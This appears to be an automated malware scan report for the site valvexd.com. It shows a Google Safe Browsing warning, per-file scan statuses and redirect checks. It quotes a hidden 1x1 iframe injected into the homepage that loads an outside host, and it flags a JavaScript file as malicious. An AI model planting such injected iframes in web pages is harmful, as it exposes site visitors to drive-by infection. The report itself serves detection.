Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=valvexd.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.valvexd.com/ | 200 OK Content-Length: 17467 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.valvexd.com/js/main.js | 200 OK Content-Length: 6211 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function menuFix() {
var sfEls = document.getElementById("nav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=(this.className.length>0? " ": "") + "sfhover"; } sfEls[i].onMouseDown=function() { this.className+=(this.className.length>0? " ": "") + "sfhover"; } sfEls[i].onMouseUp=function() { this.className+=(this.className.length>0? " ": "") + "sfhov Antivirus reports:
| ||
http://www.valvexd.com/images/qq/ServiceQQ.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
http://www.valvexd.com/test404page.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
http://zjnet.zjaic.gov.cn/bsjs/330324/33032400011116.js | 200 OK Content-Length: 182 Content-Type: text/javascript | clean |
http://s1.maibiso.com/stat.aspx?id=5 | 200 OK Content-Length: 1637 Content-Type: text/html | clean |
http://s1.maibiso.com/Count.ashx?wid=5&m="+readCookie('stat_Mac_5')+"&cs="+readCookie('stat_cs_5')+"&f="+readCookie('stat_f_5')+"&sw="+(screen.width)+"&sh="+(screen.height)+"&c="+(screen.colorDepth)+"&ir="+readIsRefrensh('stat_isRefrensh_5')+"&jl="+JsLocationUrl('stat_f_5')+"&r="+GetReferrer()+" | 200 OK Content-Length: 66 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: valvexd.com
Result:
GET / HTTP/1.1
Host: valvexd.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: valvexd.com
Referer: http://www.google.com/search?q=valvexd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: valvexd.com
Referer: http://www.google.com/search?q=valvexd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.